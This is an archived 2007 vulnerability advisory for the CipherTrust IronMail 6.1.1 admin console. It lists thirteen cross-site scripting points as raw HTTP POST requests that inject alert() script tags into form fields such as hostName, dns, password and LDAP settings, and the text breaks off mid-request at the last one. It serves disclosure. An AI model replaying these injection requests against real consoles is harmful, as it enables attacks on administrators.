AOH :: HP Unsorted I :: TB10093.HTM

IronMail XSS



Multiple XSS in IronMail
Multiple XSS in IronMail



This is a MIME-formatted message.  If you see this text it means that your
E-mail software does not support MIME-formatted messages.

--=_gantz-15840-1174901611-0001-2
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Content-Transfer-Encoding: 7bit

Founded multiple XSS in IronMail.

See attached advisory. Spanish version in http://www.514.es. 

Regards,

- J

--=_gantz-15840-1174901611-0001-2
Content-Type: text/plain; name="SIAADV-07-004-EN.txt"; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline;
 filename="SIAADV-07-004-EN.txt"

          ==============================                   - Advisory -
          ==============================  
  T=EDtulo:   Multipls XSS in Cypherstrust Ironmail 6.1.1
    Risk:   Medium
    Date:   20.Feb.2007
  Author:   Javier Olascoaga       
WEB: http://www.514.es/ 


=2E: [ INTRO ] :.
=09
IronMail protects enterprise email systems from inbound threats: spam, viruses;
or hackers trying to take down or take over the e-mail system. IronMail protects
enterprise email systems from outbound threats: regulatory compliance violations
, corporate policy violations, or theft ("leakage") of confidential information 
or intellectual property. IronMail protects enterprise email systems from threats that haven't even been identified yet. 

=2E: [ TECHNICAL DESCRIPTION ] :.

During the development of the technical tests against the IronMail mail system 
have been detected several Cross Site Scripting vulnerabilities in the 
administration console of the product.


Next you can find the XSS founded:

=2E: [ XSS #1 ] :.

POST https://172.0.0.2:10443/admin/systemRouting.do?method=submit HTTP/1.1
Referer:
https://172.0.0.2:10443/admin/systemRouting.do?method=init&isMenuToggled=1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 295
Cache-Control: no-cache
Cookie: CTSecureToken=53DFBE4753D221B2707050E96902E98D_admin;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemRouting.do%3Fmethod%3Dinit%26isMenuToggled%3D1;
menusToExpand=%2CConfigurationMenu%2C; tabbedMenuSelected=11;
/admin/queueManager.dofirsttimeload=1; /admin/queueManager.do=;
JSESSIONID=B227892A258E91419C09469E49AED4D4
  'rows%5B0%5D.networkId=172.16.0.0&rows%5B0%5D.netmaskId=255.255.0.0&rows%5B1%5D.networkId=192.168.0.0&rows%5B1%5D.netmaskId=255.255.0.0&network=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&netmask=128.0.0.0&defRouterIp=%27%3E%3Cscript%3Ealert%28%27SIA2%27%29%3C%2Fscript%3E&submit=Submit


=2E: [ XSS #2 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/system_IronMail.do?method=getDetail&isMenuToggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 343
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DgetDetail%26isMenuToggled%3D1;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
Wmtu=1500&hostName=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&domainName=sytes.net&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1=2E5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadridðernetSetting=autoselect&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:11:46 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

=2E: [ XSS #3 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 341
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
Umtu=1500&hostName=mmail11&domainName=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadridðernetSetting=autoselect&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:26 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

=2E: [ XSS #4 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 337
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
Qmtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadridðernetSetting=autoselect&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:31 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

=2E: [ XSS #5 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 337
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
Qmtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadridðernetSetting=autoselect&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:36 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

=2E: [ XSS #6 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 338
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
Rmtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadridðernetSetting=autoselect&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:41 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

=2E: [ XSS #7 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 340
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
Tmtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=10.1.1.3&dns2=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadridðernetSetting=autoselect&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:48 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8


=2E: [ XSS #8 ] :.

POST https://172.0.0.2:10443/admin/systemOutOfBand.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/systemOutOfBand.do?method=getDetail&isMenuToggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 154
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemOutOfBand.do%3Fmethod%3DgetDetail%26isMenuToggled%3D1;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
outOfBand=true&mtu=1500&ipAddress=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3EðernetSetting=autoselect&ipNetMask=255.255.255=2E224&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:13:16 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

=2E: [ XSS #9 ] :.

POST https://172.0.0.2:10443/admin/systemBackup.do?method=submit HTTP/1=2E1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/systemBackup.do?method=init&isMenuToggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 146
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemBackup.do%3Fmethod%3Dinit%26isMenuToggled%3D1;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
password=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&confirmPassword=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:13:41 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

=2E: [ XSS #10 ] :.

POST https://172.0.0.2:10443/admin/systemLicenseManager.do?method=submit
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/systemLicenseManager.do?method=init&isMenuToggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 75
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemLicenseManager.do%3Fmethod%3Dinit%26isMenuToggled%3D1;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
Klicense=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:20:28 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

=2E: [ XSS #11 ] :.

POST https://172.0.0.2:10443/admin/systemWebAdminConfig.do?method=save
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/systemWebAdminConfig.do?method=init&isMenuToggled=1&procId=90
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 1225
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=15;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemWebAdminConfig.do%3Fmethod%3Dinit%26isMenuToggled%3D1%26procId%3D90;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
procId=90&rows%5B0%5D.attrName=gui_log_level&rows%5B0%5D.attrType=12&rows%5B0%5D.attrValidate=%5BLabelValueBean%5BCRITICAL%2C+1%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BINFORMATION%2C+5%5D%2C+LabelValueBean%5BDETAILED%2C+6%5D%5D&rows%5B0%5D.attrValidateStr=30060003%3A1%2C30060004%3A4%2C30060005%3A5%2C30060006%3A6&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=4&rows%5B0%5D.langTagId=2000003&rows%5B0%5D.attrValue=4&rows%5B1%5D.attrName=gui_timeout&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-30%5D&rows%5B1%5D.attrValidateStr=%5B1-30%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=30&rows%5B1%5D.langTagId=2001014&rows%5B1%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B2%5D.attrName=auto_refresh&rows%5B2%5D.attrType=2&rows%5B2%5D.attrValidate=%5B1-30%5D&rows%5B2%5D.attrValidateStr=%5B1-30%5D&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=0&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=4&rows%5B2%5D.langTagId=2001017&rows%5B2%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA2%27%29%3C%2Fscript%3E&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:21:27 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

=2E: [ XSS #12 ] :.

POST
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=init&procId=164
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2840
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=11;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceProperties.do%3Fmethod%3Dinit%26procId%3D164;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2C;
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows%5B0%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B1%5D.attrName=sync_results_count&rows%5B1%5D=2EattrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrValidateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5D.langTagId=2016402&rows%5B1%5D.attrValueStr=50&rows%5B2%5D=2EattrName=sync_rules_order&rows%5B2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%5D.attrValidateStr=&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=&rows%5B2%5D.langTagId=2016403&rows%5B2%5D.attrValue=&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.attrType=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&rows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%5D.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.attrType=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr=%5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTagId=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_intvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%5B5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5D.attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValidate=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORMATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.langTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_route_aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.attrValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&rows%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.langTagId=2016408&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:22:51 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

=2E: [ XSS #13 ] :.

POST
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2840
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=11;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceProperties.do%3Fmethod%3Dinit%26procId%3D164;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2C;
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows%5B0%5D.attrValueStr=24&rows%5B1%5D.attrName=sync_results_count&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrValidateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5D.langTagId=2016402&rows%5B1%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B2%5D.attrName=sync_rules_order&rows%5B2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%5D.attrValidateStr=&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=&rows%5B2%5D.langTagId=2016403&rows%5B2%5D.attrValue=&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.attrType=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&rows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%5D.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.attrType=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr=%5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTagId=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_intvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%5B5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5D.attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValidate=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+1%5D%2C+LabelValueBean%5BSHUTD